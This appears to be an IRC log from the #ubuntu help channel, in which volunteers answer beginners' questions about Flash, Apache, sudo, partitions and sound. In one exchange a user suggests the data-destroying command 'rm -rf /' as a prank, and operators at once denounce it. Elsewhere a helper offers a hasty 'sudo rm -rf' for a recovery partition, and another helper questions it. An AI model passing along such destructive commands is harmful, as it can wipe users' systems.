makaveli0129ActionParsnip: ok installed that and formatted how do i mount now?19:17
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celeritasrikkimaru, just looked at the pastebin. looks like your partition table is broken. if their is no sensitive data on the card, try to repartition the card. you will also have to reboot19:17
Nixloz<rikkimaru> sudo mount /dev/sdc1 /mnt19:18
rikkimaruceleritas, how can i repartition the card if it only has 512kB19:18
Lasivianhrrm, it seems UBuntu is detecting my TV completely wrong19:18
Lasivianright brand, wrong size19:18
Lasiviannot sure how to fix that19:18
rikkimaruNixloz, there is no partition to make sdc119:18
makaveli0129ActionParsnip: should it be mount /dev/sdc1?19:19
Nixloz<rikkimaru> are you trying to mount or to format?19:19
absrdfunhello all19:19
rikkimaruNixloz, i'm trying to get something to show me the card isn't broken19:19
rikkimaruNixloz, fdisk states it has a total of 512kB, when its a 4GB card19:19
thune3rikkimaru: is this brand new card. And the pastebin you showed said "Disk /dev/sdc doesn't contain a valid partition table"19:20
toyman61Lucid 64-bit: When I try to download a JNLP-file using Firefox I can choose to open it using OpenJDK Java 6 Web Start (standard). How can I change this so that I can use Sun Java 6 Web Start ?19:20
Nixloz<rikkimaru> you could give testdisk a try, it's capable of rebuilding the parition table without touching the data19:20
ActionParsnipmakaveli0129: if the partition exists, yes19:20
rikkimaruthune3, it's not a new card. I was using it yesterday. I ran mkntfs on a partition and then this happened19:20
rikkimaruNixloz, the data isn't important to me, but i'll give it a look19:21
ActionParsnipmakaveli0129: i'd use foremost to attempt recover the data from the device. I'd just format it fresh then restore the data from backup19:21
n8wis it possible to install lightning on 64bit ubuntu?19:21
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Lasiviananyone know how to fix overscan on an HDMI -> TV connection?19:21
absrdfuncan someone help me? i'm absolutely new to ubuntu. i want to use it only from boot usb. i would like to skip the 'try ubuntu' vs 'install ubuntu' start window at boot. i've tried to google it, but couldn't find it.19:21
blalbActionParsnip, thanks, but I think I may have incorrectly described my problem. Ubuntu no longer respects my choice when I use the Login Screen program to select what kind of session to use. It uses the netbook edition desktop regardless of my choice19:22
D347H-C0D3hey gys... I am trying to set up a bootable file system using debootstrap.19:22
D347H-C0D3I executed the command debootstrap --arch i386 jaunty /nfsroot/kerrighed http://archive.ubuntu.com/ubuntu/19:22
D347H-C0D3Now its downlaoding files from internet.But cannot i just dump my ubuntu Cd in the folder /nfsroot/kerrighred19:22
rumberttoyman61: i suggest not, as long as it works, openjdk usually works better than Sun, because Sun version does not display fonts correctly.  If you want to run the jnlp file, do it with javaws.19:22
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absrdfunthanks in advance19:22
ActionParsnipblalb: ok then boot to recovery root console, make a new folder in your home folder and move ~/.g*  and ~/.config   to the new folder19:22
rinzaihi everyone19:22
Nixlozhi rinzai19:23
toyman61rumbert, : Yes, I want to run the jnlp-file. I will try using javaws. Can I run this from the desktop, or do I have to run it in a terminal ?19:23
ActionParsnipblalb: when you log back in the folders will be regenerated and you will get a vanilla system19:23
rumberttoyman61: it does not matter.19:23
blalbill see what happens. thanks :)19:23
toyman61rumbert, : How do I start javaws on the desktop ?19:23
rumberttoyman61: it has no GUI though.19:23
cousteaurumbert: wait... that annoying bug of crippled fonts was Sun Java's fault?19:24
l_rhere we are19:24
toyman61rumbert, : I'll try the terminal then.. :-)19:24
rinzaisometime ago I tried to configure Jack on Lucid, and ever since then I just have the outline of the volume setting on the panel (with no functionality). Can anyone point me to a tut on how to get it back (sorry noob question)19:24
rinzaiI tried to restart pulseaudio manually, but it still doesn't show19:24
rinzai(the icon, that is)19:24
cousteaurumbert: this one http://img227.imageshack.us/img227/1186/pantallazomatlabtullidobi5.png - happened when I used grayscale font rendering with any Java program19:25
rumbertcousteau: yes.  The only way to get good fonts with Java Swing is to use GTK LAF + OpenJDK.  I don't know about GCJ/GIJ.19:25
zorkmidonhow can I use crontab to change the desktop wallpaper?19:25
celeritasrikkimaru, sounds like your card may be broken. 512kb is a specific block size for some card manufacturers. even if mkntfs screwed up, 512kb is defenitely wrong19:25
rumbertcousteau: that overlaying of fonts is a different problem.  I do not know it.19:26
cousteauomg, about 2 years asking why that happened in several places and got no answer... thanks rumbert19:26
D347H-C0D3hey gys... I am trying to set up a bootable file system using debootstrap.19:26
D347H-C0D3I executed the command debootstrap --arch i386 jaunty /nfsroot/kerrighed http://archive.ubuntu.com/ubuntu/19:26
D347H-C0D3Now its downlaoding files from internet.But cannot i just dump my ubuntu Cd in the folder /nfsroot/kerrighred.19:26
D347H-C0D3Thanx in advance19:26
FloodBot2D347H-C0D3: Please don't flood, use http://paste.ubuntu.com to paste, don't use Enter as punctuation.19:26
cousteaurumbert: oh... ok :(19:26
shazkhannayone knows how to generate initrd for new custom kernel?19:26
rumbertcousteau: The problem with Sun Java fonts is improper scale.19:26
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DagnyAnyone able to give me some advice via PM? I have wireless issues19:27
Nixloz<shazkhan> i believe grub-mkimage19:27
ubottuPlease ask your questions in the channel so that other people can help you, benefit from your questions and answers, and ensure that you're not getting bad advice. Please note that some people find it rude to be sent a PM without being asked for permission to do so first.19:27
cousteauanyway, maybe when I upgrade to Lucid and install OpenJDK the problem gets solved19:28
gixgixdoes anyone know of a way to disable automatic camera mounting?19:28
shazkhanNixloz: thanks let me try .. can u quote the exact command?19:28
gixgixin other words, to make it so that when i plug in a camera it doesn't automatically show up on the desktop...19:28
shazkhanNixlox does it work on 9.10 or is it compatible only with 10.04?19:28
cousteaumaybe it has to do with my graphics card, but it only happens with Java (Matlab, OpenOffice...)19:29
absrdfundoes anyone know how to disable the 'try/install' window on start from a liveusb??? thankyou!!!19:29
Nixloz<shazkhan> http://manpages.ubuntu.com/manpages/jaunty/man1/grub-mkimage.1.html19:29
shazkhanthanks again19:29
Nixloz<shazkhan> it should work on both, versions do not differ too much19:29
thune3absrdfun: in the syslinux or isolinux dir there are some files (access through /cdrom in live boot) prompt.cfg isolinux.cfg stdmenu.cfg have timeout values, i don't know which one does what you want. but this is where to look19:30
shazkhanNixloz: Having a look now19:30
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cousteauwhat OpenOffice is there on Ubuntu repositories? the official one or the Go-oo one?19:32
tomreynso i have uninstalled all packages containing 'gwibber'. why is gwibber-service still running?19:32
absrdfunthune: thanx! i'll try, though i'm absolute beginer!! thx!19:32
daohi, /etc/init/ssh.conf starts sshd with 'exec /usr/sbin/sshd'. i'd like to start sshd with nice -10. do i rewrite the exec line as "exec /usr/bin/nice -10 /usr/sbin/sshd"? would like to confirm so i don't lock myself out of the vps ..19:33
Mike9863I recently upgraded to Lucid and noticed that the fonts in Firefox on most websites had changed. I like the font and would like to know how I can set it as my Application Font under Appearance Preferences19:33
Nixloz<shazkhan> have a look at this page: https://help.ubuntu.com/community/Kernel/Compile19:34
stefgcousteau: neither official, nor Go-oo ... official with selected Go-oo patches IMHO19:34
cousteauhmm, messy19:34
blalbActionParsnip, that didn't solve the problem :/19:34
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blalbperhaps it will behave if i replace the .xsession file with the default version19:34
blalbdo you know where i can find it?19:35
ActionParsnipblalb: you have a bckup of the old folders though so you can easily restore19:35
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mdpatrickHey guys! I have a new ubuntu desktop I setup. Is there a good list of apps to install for powerusers & recent converts?19:39
mdpatrickI'm kind of a n00b but I've tinkered with ubuntu before -- also, what's a good IRC client (for GUI of course!)19:39
nicole_hi... how do i get wine to make the fonts white in some games like ageofempires?19:39
vltHello. From KDE I know the very handy tool klipper. It saves all my ckipboard content, lets me browse and re-use anything I copied before. I really miss this in my fresh ubuntu installation. Is there something liek that in gnome too?19:39
indian_munndais there any command to check which and how much mb graphics card i am using?19:39
icerootmdpatrick: no because everone is prefering other things19:39
mdpatrickvlt: That's turbocool.19:39
dalihow can i install libamrnb3?19:40
zorkmidonHey all is there a fix for the issue of the mouse themes while using compiz, nothing works, only while i'm on fire fox. Ideas anyone?19:40
mdpatrickiceroot: So? I'm looking for a curated list19:40
icerootvlt: you can use klipper in gnome19:40
icerootmdpatrick: for what?19:40
ircleuserhello, everybody, i have a little problem with my wireless USB card on Ubuntu 10.04 and wonder if anybody can help. PS: im new to Linux Ubuntu world !19:40
mdpatrickI don't have specific needs atm, iceroot, I just want to shop around19:41
SlidingHornircleuser: what's the problem you're having?19:42
ircleuserwell, i can see my wireless router but cannot conect to it19:43
thune3absrdfun: it's either the isolinux.cfg or syslinux.cfg file (only one will exist i don't remember which for usb), change the timeout from 50 to something small 1 or 219:43
EpikHello Everyone, There seems to be somewhat of a known issue with the e1000e driver on Ubuntu, in specific with the "Intel Corporation 82566DC-2 Gigabit Network Connection (rev 02)" NIC. Is there a known workaround to set the linkspeed to 100mbit instead of 10? I've tried ethtool etc.. however it will not allow any settings over 10mbit19:45
vlticeroot: I see. I need to install the whole kdelibs and kdebase ... and it looks like it doesn't really belong there ;-)  Is there really nothing liek that for gnome?19:45
Nitrus^how do i update straight from 8.04 to current?19:46
icerootvlt: glipper19:46
n3rd_dudehi, I'm trying to use ffmpeg on lucid to convert an AVI video to MP4 using the xvid codec but when I try to convert I get an error that says, "Unknown encoder 'libxvid'"19:46
iceroot!upgrade | Nitrus^19:46
ubottuNitrus^: For upgrading, see the instructions at https://help.ubuntu.com/community/UpgradeNotes - see also http://www.ubuntu.com/desktop/get-ubuntu/upgrade19:46
xloosescrewxhello, i am new to ubuntu, i am trying to get flash to work.  I went to youtube to play a vidoe and all I get is a black screen, can someone please help?19:46
n3rd_dudeany help?19:46
Nitrus^oh duh19:46
Nitrus^sorry, RTFM FTW!19:47
n3rd_dudexloosescrewx: go to ubuntu software center19:47
ubottuTo install Flash see https://help.ubuntu.com/community/RestrictedFormats/Flash - See also  !Restricted and !Gnash19:47
n3rd_dudexloosescrewx: search for adobe flash19:47
theadminxloosescrewx: Run "sudo apt-get instlal flashplugin-installer" in terminal (Applications, Accessories, Terminal) and see if it helps19:47
SlidingHornircleuser: take a look @ this thread on the ubuntu forums (http://ubuntuforums.org/showthread.php?p=6183681) and post the output of the commands at http://paste.ubuntu.com -- then post the link it gives you in here (and remind us what the issue is)19:47
xloosescrewxok thanks19:47
Roasteddoes anybody know if I can customize the default appearance of apache when I go to my web server IP?19:47
itguruxloosescrewx: Those flash instructions are for you19:47
icerootxloosescrewx: sudo apt-get install flashplugin-nonfree19:47
magnetronRoasted: i know you can19:47
itguruRoasted: you mean like edit the web page displayed?19:47
icerootRoasted: sure19:48
Roasteditguru, yes.19:48
icerootRoasted: /var/www/index.html19:48
itguruUpload new html19:48
Roastedmagnetron, how exactly do you go about doing it?19:48
xloosescrewxi have flash installed already .  i just can't seem to get it to work19:48
SlidingHornRoasted: simply open the index.html file in /var/www/ with your favorite text/html editor and make whatever changes you want19:48
Roastediceroot, I opened the default index.html, but it comes up saying IT WORKS! etc. It's the test page. Can I edit that for my FINAL layout and completely overwrite that?19:48
itguruxloosescrewx: have you rebooted the system, shutdown the browser etc?19:48
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icerootxloosescrewx: restart the browser19:48
kleanchapI have a directory tree with lots of zip files.  Some of the zip files have zip files in them.  I want to extract all of them into their respective directories.  How can I do this on Ubuntu?19:48
icerootRoasted: sure19:49
Epikxloosescrew when you install with the package manager it auto configures into firefox19:49
xloosescrewxyes itguru ive done all of that19:49
n3rd_dudehow can I use ffmpeg to convert an AVI video to MP4 using xvid? when I try to convert, I get an error that says, "Unknown encoder 'libxvid'"19:49
SlidingHornRoasted: or, you can simply upload a new index.html and allow it to replace the one that's already there (sorry for multiple posts guys)19:49
magnetronRoasted: i would suggest you edit your apache config19:49
itguruWhat browser are you using? @ xloosescrewx19:49
icerootn3rd_dude: sudo apt-get install avifile-xvid-plugin   and please dont repeat19:49
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n3rd_dudeiceroot: thank you :) and okay :) sorry19:49
icerootn3rd_dude: also install libxvidcore419:49
n3rd_dudeiceroot: oh so that's what it's called! I'm an arch user ;)19:50
n3rd_dudeiceroot: ubuntu on livecd19:50
xloosescrewxitguru I have firefox installed19:50
icerootn3rd_dude: you can search the repos with "apt-cache search searchstring"19:50
regeyareatings melkor19:51
n3rd_dudeiceroot: thanks..I've forgotten my way around ubuntu actually..I was a +1 yr user ;)19:51
itguruxloosescrewx: what version of ubuntu you running?19:51
xloosescrewxitguru i'm using ubuntu 10.419:52
dalihow can install ibamrnb3?19:52
Roasteddoesnt look like this is working19:53
icerootdali: in what format do you have it?19:53
RoastedI pasted my layout in /var/www/index.html and nothing is flying19:53
icerootdali: deb, tar.gz?19:53
n3rd_dudeiceroot: uh..dude, it's still not working? same error19:54
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itguruxloosescrewx: have you uninstalled flash, rebooted, and then reinstalled?19:55
itguruxloosescrewx: flash is a tricky one, because there is an automated way of doing it for ubuntu19:56
xloosescrewxitguru no i didn't I will uninstall flash then re install19:56
icerootitguru: no need for reboot. can you paste the output of "dpkg -l flashplugin-nonfree"19:56
icerootxloosescrewx: dpkg -l flashplugin-nonfree19:56
Epikiceroot, you seem to be the person to ask, any idea on how to solve my network interface issue?19:56
icerootitguru: the second one was not for you :)19:57
icerootEpik: no, because i dont know what the problem is19:57
Epikiceroot: There seems to be somewhat of a known issue with the e1000e driver on Ubuntu, in specific with the "Intel Corporation 82566DC-2 Gigabit Network Connection (rev 02)" NIC. Is there a known workaround to set the linkspeed to 100mbit instead of 10? I've tried ethtool etc.. however it will not allow any settings over 10mbit19:57
Epikim on 10.4 as well19:57
icerootEpik: the e1000e is a very bad thing :)19:58
icerootEpik: sorry i dont know because i dont have that ca19:58
venik212an icon labeled FACTORY_IMAGE has appeared on my gnome Desktop (ubuntu 10.04).  How do I remove it?  It seems to be the boot partition19:58
EpikOkay it seems to be what was installed by default19:58
itguruxloosescrewx: I think iceroot was talking to you19:58
Epikwhat other options do i have?19:58
Epik<venik212> sudo rm -rf /path/to/file.name19:59
daliicerroot could you help me?19:59
venik212wouldn't that remove my boot partition?19:59
regeyavenik212: just guessing here, I'm GUESSING that that's probably a rescue partition put on your hard drive by the computer manufacturer19:59
venik212I suspect taht might be really bad, wouldn't it?19:59
icerootvenik212: sounds like a recovry partiton for windows20:00
Epik<venik212> if you were to do sudo rm -rf /boot then yes, however if you were to do sudo rm -rf /boot/path/to/your/file.name20:00
Epikthen no20:00
PiciEpik: It sounds like this is a recovery partition for another OS.  I don't think that venik212 wants to delete it.20:00
EpikPici: he asked how to remove it, dont think its up to us what he wants to keep or not20:01
icerootEpik: remove == umount20:01
venik212the computer came with Vista installed on it, and it is still running vista (if I boot into it)20:01
xloosescrewxiceroot it didn't work  I get this message un flashplugin - no <none> (no description available20:01
icerootxloosescrewx: because you have not installed that plugiin20:02
venik212I unmounted it, and it disappeared form the desktop20:02
icerootxloosescrewx: sudo apt-get install flashplugin-nonfree20:02
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venik212Apparently, that is all that I had to do20:02
webPragmatistis it safe to replicate         /etc/default/ accross servers20:02
wadSo I'd like to have more features around my clipboard. See a history of copies, and repaste it, etc. What's a good tool? In the past, I've used klipper, but it was pretty slow. I'd like something more speedy. Suggestions?20:02
icerootwad: glipper20:02
venik212how can I get Nautilus to open ALWAYS with two panels?20:03
l337ingDisorderIs there a way to grant a user permission to add jobs to cron.d without giving them root access?20:03
Epikiceroot: do i have an alternative to e1000e using Intel Corporation 82566DC-2 Gigabit Network Connection (rev 02)?20:03
icerootl337ingDisorder: why not using crontab -e20:03
xloosescrewx iceroot I checked it and for the add ons it says i have shockwave flash gnu swf player installed20:03
zorkmidonhow do i resume a paused job?20:03
Travis-42is there any way to make empathy messages pop up to be visible? I can never notice them in the ubuntu messaging menu.20:03
icerootzorkmidon: fg20:03
dalii would like to know what is the reason for me see movies on net to slow?P thaey say to instal w 32 codecs, where can i found the best one20:04
ActionParsnipl337ingDisorder: yes users can add their own jobs but will only run as themselves20:04
wadiceroot, thanks! I'll give it a try.20:04
ActionParsnip!medibuntu | dali20:04
ubottudali: medibuntu is a repository of packages that cannot be included into the Ubuntu distribution for legal reasons - See http://www.medibuntu.org20:04
l337ingDisordericeroot: The user needs to be able to add cron jobs executable by apache20:04
zorkmidoniceroot, thanks20:04
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ActionParsnipdali: there is no best one, w32codecs is a package name20:04
blalbActionParsnip: Ok, so if i create a new user account, the new user does -not- have the problem20:05
xloosescrewxiceroot I went to the adobe flash webpage and installed the adobe player and I checked that it was insatlled, but after reboot now I cant find it.20:05
zorkmidoniceroot, how do I cancel it?20:05
dalibut i misses  ibamrnb3 where can i find it?20:05
icerootxloosescrewx: sudo apt-get install flashplugin-nonfree20:05
Roastedhey guys, when I edit the apache page @ /var/www/index.html,. nothing happens - why?20:05
icerootzorkmidon: ctrl + c20:05
zorkmidoniceroot, (:20:05
xloosescrewxok iceroot i will do that20:05
blalbso do you know a way I can destroy and recreate my user account without ruining everything?20:06
icerootRoasted: ctrl + f5 on that page toclear cache20:06
minimecdali: If you use the normal movie player (Totem), the w32codecs will not help you, as totem uses gstreamer framework...20:06
daliwhat should i do?20:06
dalii see from net20:06
Roastediceroot, no dice.20:06
dalihow can install ibamrnb3?20:06
Roastediceroot, and I have 777 permissions on the index.html file too...20:07
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icerootRoasted: and apache is pointing to /var/www/index.html and not /var/www/default.../index.html20:07
Roastediceroot, how do I verify that20:07
icerootRoasted: never!!!! use 777 with apache!!! never!!!20:07
Roastediceroot, I know. I just set it to 777 to see if that was the issue.20:07
AlchimistaHi there, could anyone tell me what's the channel for sound problems?20:07
Roastediceroot, believe me I know the risks there :P20:07
grpacehello... new to ubuntu... have some questions20:07
galerienHello everyone, my Lucid can't play the sound of the video I'm watching with vlc, and totem and mplayer can't even play the video (stay on the first frame)... does anyone know what might be going on here?20:07
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icerootRoasted: cat /var/log/apache2/access.log  see what file is used20:08
ActionParsnipblalb: its the settings in the profile then, are you sure you moved ALL the gconf and gnome based folders as well as .config to the extra folder?20:08
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iceroot!ask | grpace20:08
ubottugrpace: Please don't ask to ask a question, simply ask the question (all on ONE line and in the channel, so that others can read and follow it easily). If anyone knows the answer they will most likely reply. :-)20:08
Roastediceroot, wow. a lot...20:08
blalbActionParsnip, I moved .g* and .config20:08
icerootRoasted: ah maybe less is a better option then cat :)20:08
blalbare there user-related settings anywhere else?20:09
Alchimistagalerien: is it on a laptop?20:09
itguruWOOOOO paraguay 1 - Italy 0 :)20:09
icerootblalb: for what?20:09
galerienAlchimista: but I never had sound problem before20:09
grpaceok...  just trying to be diplomatic...   Have installed 32-bit on my machine (a 64-bit) machine.  Why does ubuntu suggest it's not good for everyday use?20:09
Alchimistagalerien: i'm having the same problem :S IS it an lg?20:09
icerootblalb: normally everything starting with . in your home20:10
* itguru says oops! that was for another window20:10
Seb_I try to create an own ubuntu vm with python-vm-builder. It works fine so far, except that it is not using the install_mirror command to use apt-cacher-ng...20:10
Roastediceroot, so use less in place of cat? less /var/log/whatever?20:10
ActionParsnipblalb: you could copy the folders from the new user to the original after deleting the current ones, then chown to the user20:10
Seb_can anyone tell me how to tell it to use apt-cacher-ng?20:10
zambahow can i open for all to log in using rshd?20:10
galerienAlchimista: and amarok/rhythmbox sound is good20:10
icerootRoasted: yes, i think less is a good option,some people like using vim on that,others less. there is also zless to see zipped log-files20:10
kuntauhelp... how to disable password request everytime i want to install software??20:11
galerienAlchimista: no, Asus, but I think it's more software related...20:11
Alchimistaoh, so you're lucky, i have no sound at all :s just plugging externals :S20:11
BrainBug[BE]Hello, i've got a problem, when i mount eg /dev/sda5 i can access it like it should (nog fstab entries) but when i then go see at " places -> computer" my partition is gone..? any idea how come?20:11
icerootkuntau: you can to that in the sudoers file but its not a good idea20:11
ActionParsnipkuntau: if you use terminal, you will get a grace period where the password isnt needed for a while20:11
ActionParsnipkuntau: i wouldnt mess with sudoers either, you can screw your system and need to boot to live cd to fix (not worth it)20:12
Roastediceroot, I still get a lot back... hmm20:12
Roastediceroot, would it be in apache config?20:12
ActionParsnipkuntau: if you use terminal, you can use: sudo -i    and yu will not need a password til you type: exit20:12
icerootRoasted: you should look there what file apache is using if you access your domain/ip20:13
Roastediceroot, look where?20:14
icerootRoasted: /var/log/apache2/access.log20:14
kuntaubut it kinda annoying20:14
jMylesI want to change the screen resolution of the login screen in lucid.  It seems that there are many approaches, which one is best / accurate?20:14
kuntaueverthing need to put password20:14
kuntauwhat a bummer20:14
SlidingHornkuntau: it is for your own protection that sudo doesn't stay in effect for long (I think 15 min is the default) -  It is best to stick with the default settings in this case, as you may inadvertently harm your machine by making changes to the configurations of system files, etcl.20:15
grpacewhy is 64-bit ubuntu not recommended for everyday desktop use?20:15
icerootkuntau: no is a great security feature20:15
kuntauand my password is like 10chars to type everytime20:15
xloosescrewxOk now I am getting frustrated, I still can't view any video, can someone please help.20:15
kuntauthen it is just like vista UAC20:15
galeriengrpace: some application might not run good because not optimised for 6420:15
icerootkuntau:  i bet if you disable password-dialog, in one week you would ask here "i have killed my system because i am always root, what can i do"20:15
oCean_grpace: the wording of that advise is not the best it could be20:15
Seb_kuntau, if you haven't seen, ubuntu is windows for linux *scnr*20:15
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daliwhat could be the reason for me seing to slow the videos from net?20:16
SlidingHornkuntau: not sure what that feature is on vista, but if it is...it's a knockoff of sudo instead of the other way around ;)20:16
PiciSeb_: Most Linux distros do give you root access by default.20:16
grpacegimme the best it can be... i'm d/l it now.20:16
icerootgrpace: it is recommend,just need a amd64 cpu20:16
kuntauin terminal sure got like 15mins time20:16
grpacegot pentium 2.2 dual20:16
kuntaubut if i use gui it ask me like 20 times in 30mins20:17
Seb_anyways, anyone an idea to the problem I posted before?20:17
kuntauhow do i disable it20:17
icerootkuntau: man sudoers20:17
Seb_it's about apt-cacher-ng and python-vmbuilder20:17
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Seb_and vmbuilder is not using the install_mirror command for apt-cacher-ng20:18
kuntauthis man is like 1000lines long lol20:18
Guest54152kuntau, what20:18
grpacedoes installing 64-bit ubuntu over-write everything i have installed in the 32-bit version?20:18
icerootkuntau: if you want to be root you have to read :)20:18
icerootgrpace: yes20:19
xloosescrewxcan someone please help me, I've tried several times to play video with no success, Iv installed flash re-installed, uninstalled, restarted etc... no luck20:19
icerootgrpace: but you can keep your /home20:19
kuntauwell actually is 1330 lines LOL20:19
Seb_kuntau, just create a root password, login as root and be happy :P20:19
icerootSeb_: no!!!20:19
AnxiousNuti need some help with dropbox, im trying to change the icon set, i downloaded the archive, extracted it, and moved the folder to ~/.dropbox-dist/icons/ but it didnt change! I even killed gnomepanel and resurrected it XD, and even tried restarting dropbox! and just now restarted the session! any ideas?20:19
grpacethank you iceroot.  that means all the add-ons have to be re-done?20:19
cdcdcdcNewb Question: i brought my ubuntu machine into the corporate office today. we have a networked N: drive that everyone uses. when i look in "network" in nautilus I see many many things, but no "N:/" drive. is there a way to find the "N" drive?20:19
Seb_or do rm -rf /20:19
kuntauhow u do that20:19
icerootSeb_: dont suggest that here. he wants to use the gui20:19
iceroot!ops | Seb_20:20
ubottuSeb_: Help! Channel emergency! (ONLY use this trigger in emergencies) -  elky, Madpilot, tritium, Nalioth, tonyyarusso, PriceChild, Amaranth, jrib, Myrtti, mneptok, Pici, jpds, gnomefreak, bazhang, jussi, Flannel, ikonia, maco, h00k, IdleOne, or nhandler!20:20
oCean_Seb_: DON'T !20:20
ubottuDO NOT RUN THAT COMMAND That particular command is DANGEROUS and shouldn't be uttered here. REST OF YOU: DANGER, WILL ROBINSON, DANGER! Do not use the command or utter it here thank you!20:20
* etotheipi waves goodbye to Seb_20:20
Seb_I've done it...20:20
Seb_cause I was mad lol20:20
kuntaui know what rm do lol20:20
SlidingHorn!op | Seb_20:20
icerootSeb_: that command is doing nothing because bash is not allowing it but dont post lines like that here20:20
ubottuSeb_: Help! Channel emergency! (ONLY use this trigger in emergencies) -  elky, Madpilot, tritium, Nalioth, tonyyarusso, PriceChild, Amaranth, jrib, Myrtti, mneptok, Pici, jpds, gnomefreak, bazhang, jussi, Flannel, ikonia, maco, h00k, IdleOne, or nhandler!20:20
kuntauthats the funniest linux joke20:20
oCean_kuntau: it's NOT appreciated here20:20
blalbActionParsnip, I copied over the new user's entire home folder, but nothing changed. Ubuntu still ignores the session I pick with the Login Screen program for me but does not do so for the new user20:21
kuntauso back to question how do i create root password20:21
SlidingHornkuntau: when it comes to the time limit for sudoers, you would edit the timestamp_timeout option in the sudoers file, although I wouldn't recommend it.  Read more here:  http://manpages.ubuntu.com/manpages/lucid/en/man5/sudoers.5.html20:21
galerienok, never mind, I rebooted and It worked again20:21
icerootkuntau: create a root-user doesnt help with your problm in the gui20:21
walbert1sudo su to get a root shell, and then passwd to set a password20:21
icerootwalbert1: dont use sudo su, use sudo -i20:22
grpaceiceroot... ubuntu is on a separate drive, with xampp and many add-ons installed...  i gotta redo all this if i install 64-bit?20:22
icerootgrpace: yes20:22
icerootgrpace: you cant upgrade to amd64 version20:22
Guest54152iceroot, y20:22
ikoniaSeb_: please join #ubuntu-ops20:22
kuntauim root20:22
FloodBot2kuntau: Please don't flood, use http://paste.ubuntu.com to paste, don't use Enter as punctuation.20:22
Seb_ikonia, why?20:23
Neurotiquettewhats the hot key to rapidly switch workspaces?20:23
ikoniaSeb_: because I'd like to talk to you20:23
icerootNeurotiquette: ctrl # alt # left/right arrow20:23
grpacethank you.  not the best news... but thank you all the same.20:23
icerootNeurotiquette: + instead of # :)20:23
Neurotiquetteiceroot: Awesome. Thanks!!20:23
blalbdoes anyone know of user-related settings files outside the home folder?20:24
icerootblalb: for what?20:24
icerootblalb: normally there is everything in ~/.name-of-the-app20:24
blalbiceroot: for some reason ubuntu ignores the session I pick using the "login screen" program in gnome's settings. It doesn't do this for new users, though.20:26
gixgixfrom the command line, how do i open the current directory in a window?20:26
SlidingHorngixgix: depending on what flavor of ubuntu (for normal ubuntu) you'd type: nautilus /dir/location/20:27
icerootgixgix: nautilus .   i guess20:27
gixgixah, splendid20:27
blalbiceroot: I can hand pick what session to use from the login screen, but the settings manager that I can use while logged in now has no effect20:27
Roastedso, quick question. If I want to edit the default layout of the index page on apache, what is the file to edit the html coding in? Is it /var/www/index.html? Somehow when I edit this file - NOTHING happens...20:27
icerootblalb: what you mean with "sesson"20:28
blalbiceroot: I can pick between GNOME, Ubuntu Netbook Edition, Ubuntu Netbook Edition 2d, and xmonad20:28
SlidingHornroasted: you have to make sure that you're the owner of the file (or that the file's permissions allow you as another user to edit the file), save the file and then you're all set...20:28
oCean_Roasted: yes, that's default after install. However, you could check the /etc/apache2/sites-enabled/000-default file where the DocumentRoot is20:29
vlticeroot: Thank you20:29
blalbI'm not sure what session means, but that's the label attached to the drop down menu20:29
vltI installed glipper. How to start it?20:29
RoastedSlidingHorn, I was editing the file as root with gksudo nautilus.... however when I save it and f5 the page (even ctrl f5) the changes arent applied.20:29
icerootRoasted: its /var/www/index.html (on debian) so i guess its the same on ubuntu20:29
=== simar is now known as simar_
icerootRoasted: but i already told you to look at the log which files is used20:29
vlt`glipper` -> cmd not found20:30
icerootvlt: type glipper in command line or have a look at the applications-menu20:30
Roastediceroot, I did look through the logs. Theres a ton of them. Besides, it doesnt make sense that I edited the file and NO changes were made.20:30
SlidingHornroasted: then I believe your apache is set up differently than I'm used to.  Take iceroot's suggestion to view the logs to find out which file is used20:30
biagidpHi all.  I've just upgraded my ubuntu server from 8.04 to 10.04 and I'm getting errors when trying to restart apache about port 80 already being in use.  Has anyone had experience with this error after upgrade?20:30
RoastedSlidingHorn, already been through the logs man.20:30
oCean_Roasted: the the DocumentRoot in the vhost config20:30
blalbiceroot: I can also select failsafe GNOME or an xterm20:30
SlidingHornroasted:  well then the answer is in there.20:30
webPragmatistwhy would my vim in INSERT mode left and right shows D and S or something20:30
RoastedSlidingHorn, I saw nothing relevant to what I am looking for.20:30
kalewhere do i change the contents of the grub menu?20:30
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term_oldcomp1? question:  attempting to share a folder with a win98se machine.  however it's getting a "share name not found" error when it tries to connect to it.  how to fix it pls?20:30
icerootwebPragmatist: because its not vim, its vi20:30
icerootwebPragmatist: sudo apt-get install vim20:30
=== simarmohar is now known as simar
icerootwebPragmatist: sorry, its vi not vim20:31
SlidingHorniceroot: flood alert  :-P  j/k20:31
icerootwebPragmatist: vi doesnt know the arrow-keys and noone knows why ubuntu doesnt come with vim by default20:31
* SlidingHorn dodges iceroot's shoe20:31
belisariusI'm not getting any sound output from my audigy 2 zs under 10.4. Onboard soundchip is disabled in bios and I already tried to change the mixer settings of the alsamixer in the terminal without any effect. Can anyone please help me?20:32
kuntauvim is like 27mb..20:32
icerootkuntau: and worth every bit20:32
SlidingHorniceroot kuntau +1 agreed20:32
vlticeroot: hmmm, cmd not found and not a single glipper entry in the menu ... Any idea?20:33
kalehow do i change the grub menu entries?20:33
belisariusbelisarius@ubuntu:~$ cat /proc/asound/cards20:33
belisarius 0 [Generic        ]: HDA-Intel - HD-Audio Generic20:33
belisarius                      HD-Audio Generic at 0xfe9bc000 irq 1720:33
belisarius 1 [Audigy2        ]: Audigy2 - SB Audigy 2 ZS [SB0350]20:34
belisarius                      SB Audigy 2 ZS [SB0350] (rev.4, serial:0x20021102) at 0xec00, irq 2020:34
FloodBot2belisarius: Please don't flood, use http://paste.ubuntu.com to paste, don't use Enter as punctuation.20:34
icerootvlt: have a look with dpkg -L glipper  what is installed20:34
blalbdo gnome or X store user-specific settings somewhere?20:34
icerootvlt: mabe there is the executable script20:35
belisariussorry for flooding, here the terminal output http://paste.ubuntu.com/449808/20:35
MrPink1I am trying to make an application and it gives me this: "/usr/bin/ld: warning: libgulMessage.so, needed by /home/dgoeri2s/cg-lab/lib/libbashoKernel.so, not found" the strange thing is both of those files are in the same folder "/home/dgoeri2s/cg-lab/lib/"... any ideas?20:37
bpgoldsbI'm setting up a few laptops to be used at a school.  I anticpate the student account getting mucked up from time to time.  Does anyone know of some user-friendly software to nuke their profile?20:38
ubottuSaying "It says nothing", "It does nothing" is generally not very useful for troubleshooting. Please be as specific as possible: if you see a black screen, say so, if you see a shell prompt, say so, if you see an !error message, say so - Also, most !CLI commands don't print anything when they succeed, but only when they fail.20:39
Pici!offtopic | _pg_20:39
ubottu_pg_: #ubuntu is the Ubuntu support channel, for all Ubuntu-related support questions. Please use #ubuntu-offtopic for other topics. Thanks!20:39
